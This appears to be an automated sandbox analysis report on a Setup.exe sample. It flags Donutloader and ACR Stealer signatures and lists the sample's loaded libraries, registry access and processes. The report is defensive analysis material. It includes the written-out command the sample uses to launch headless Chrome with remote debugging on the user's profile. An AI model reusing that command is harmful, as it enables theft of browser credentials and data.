Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031C6700	0_2_031C6700
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031C1793	0_2_031C1793
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031C5780	0_2_031C5780
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031A27B0	0_2_031A27B0
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031A27A2	0_2_031A27A2
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031C87C0	0_2_031C87C0
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031C3690	0_2_031C3690
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031A16A0	0_2_031A16A0
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031CE440	0_2_031CE440
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031F6483	0_2_031F6483
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031D2480	0_2_031D2480
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031F84B0	0_2_031F84B0
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031BFB30	0_2_031BFB30
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031A4B20	0_2_031A4B20
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031D7BA4	0_2_031D7BA4
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031C5BA0	0_2_031C5BA0
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031A1920	0_2_031A1920
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_032079C0	0_2_032079C0
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031C09F3	0_2_031C09F3
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031C5F40	0_2_031C5F40
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031ABF90	0_2_031ABF90
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031A1E00	0_2_031A1E00
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031BDED0	0_2_031BDED0
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031C4DB0	0_2_031C4DB0
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031A8DE0	0_2_031A8DE0
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031A5C70	0_2_031A5C70
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031C8CD0	0_2_031C8CD0

Source: C:\Users\user\Desktop\Setup.exe	Code function: String function: 03211D23 appears 64 times
Source: C:\Users\user\Desktop\Setup.exe	Code function: String function: 031D80B0 appears 49 times
Source: C:\Users\user\Desktop\Setup.exe	Code function: String function: 02D89894 appears 47 times
Source: C:\Users\user\Desktop\Setup.exe	Code function: String function: 02DC3507 appears 84 times

Source: C:\Users\user\Desktop\Setup.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6900 -s 2328

Source: Setup.exe

Static PE information: invalid certificate

Source: Setup.exe

Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows

Source: Setup.exe, 00000000.00000000.1676406632.00000000006F3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFileName vs Setup.exe
Source: Setup.exe	Binary or memory string: OriginalFileName vs Setup.exe

Source: Setup.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: 0.2.Setup.exe.2d523e4.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0.2.Setup.exe.2d523e4.0.raw.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_acrstealer_str author = Sekoia.io, description = Finds ACR Stealer standalone samples based on specific strings., creation_date = 2024-04-22, classification = TLP:CLEAR, version = 1.0, id = 63b4d6ff-0cab-44ec-9d53-bb2612371a48
Source: 0.2.Setup.exe.2d523e4.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0.2.Setup.exe.2d523e4.0.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_acrstealer_str author = Sekoia.io, description = Finds ACR Stealer standalone samples based on specific strings., creation_date = 2024-04-22, classification = TLP:CLEAR, version = 1.0, id = 63b4d6ff-0cab-44ec-9d53-bb2612371a48
Source: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13

Source: classification engine

Classification label: mal92.troj.spyw.evad.winEXE@29/25@8/7

Source: C:\Users\user\Desktop\Setup.exe

Code function: 0_2_02D50A77 CreateToolhelp32Snapshot,Thread32First,Wow64SuspendThread,CloseHandle,

0_2_02D50A77

Source: C:\Users\user\Desktop\Setup.exe

Code function: 0_2_031D20C0 CoInitialize,CoCreateInstance,MultiByteToWideChar,CoUninitialize,CoUninitialize,

0_2_031D20C0

Source: C:\Users\user\Desktop\Setup.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\76561199680660089[1].htm

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6900

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\3e330112-8ff4-43f3-aa17-c1a85db6b4c7

Jump to behavior

Source: C:\Users\user\Desktop\Setup.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior

Source: C:\Users\user\Desktop\Setup.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: chrome.exe, 00000002.00000002.2940210207.000062040043E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
Source: chrome.exe, 00000002.00000002.2943795779.0000620400AAC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT id,url,visit_time,from_visit,external_referrer_url,transition,segment_id,visit_duration,incremented_omnibox_typed_score,opener_visit,originator_cache_guid,originator_visit_id,originator_from_visit,originator_opener_visit,is_known_to_sync,consider_for_ntp_most_visited FROM visits WHERE visit_time>=? AND visit_time<? ORDER BY visit_time DESC, id DESCALUE:2};b

Source: Setup.exe	String found in binary or memory: -Helper process exited with failure code: 0x%x
Source: Setup.exe	String found in binary or memory: -HelperRegisterTypeLibrary: StatusCode invalidU
Source: Setup.exe	String found in binary or memory: /InstallOnThisVersion: Invalid MinVersion string
Source: Setup.exe	String found in binary or memory: /LoadInf=

Source: unknown	Process created: C:\Users\user\Desktop\Setup.exe "C:\Users\user\Desktop\Setup.exe"
Source: C:\Users\user\Desktop\Setup.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless=new --remote-debugging-port=12960 --remote-allow-origins=* --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --mojo-platform-channel-handle=2072 --field-trial-handle=1992,i,16733493864301612391,3478327303608930267,262144 --disable-features=PaintHolding /prefetch:8
Source: C:\Users\user\Desktop\Setup.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6900 -s 2328
Source: C:\Users\user\Desktop\Setup.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6900 -s 2324
Source: C:\Users\user\Desktop\Setup.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless=new --remote-debugging-port=12960 --remote-allow-origins=* --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --profile-directory="Default"	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --mojo-platform-channel-handle=2072 --field-trial-handle=1992,i,16733493864301612391,3478327303608930267,262144 --disable-features=PaintHolding /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Users\user\Desktop\Setup.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: acgenral.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: websocket.dll	Jump to behavior

Source: C:\Users\user\Desktop\Setup.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: Setup.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: Setup.exe

Static file information: File size 76542479 > 1048576

Source: Setup.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x2c1800

Source: Setup.exe

Static PE information: section name: .didata

Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02D601DB push edx; retf 0000h	0_2_02D601EF
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02DC34E4 push ecx; ret	0_2_02DC34F7
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_031DE071 push cs; retf 0000h	0_2_031DE072
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_03211D00 push ecx; ret	0_2_03211D13

Source: C:\Users\user\Desktop\Setup.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\Setup.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
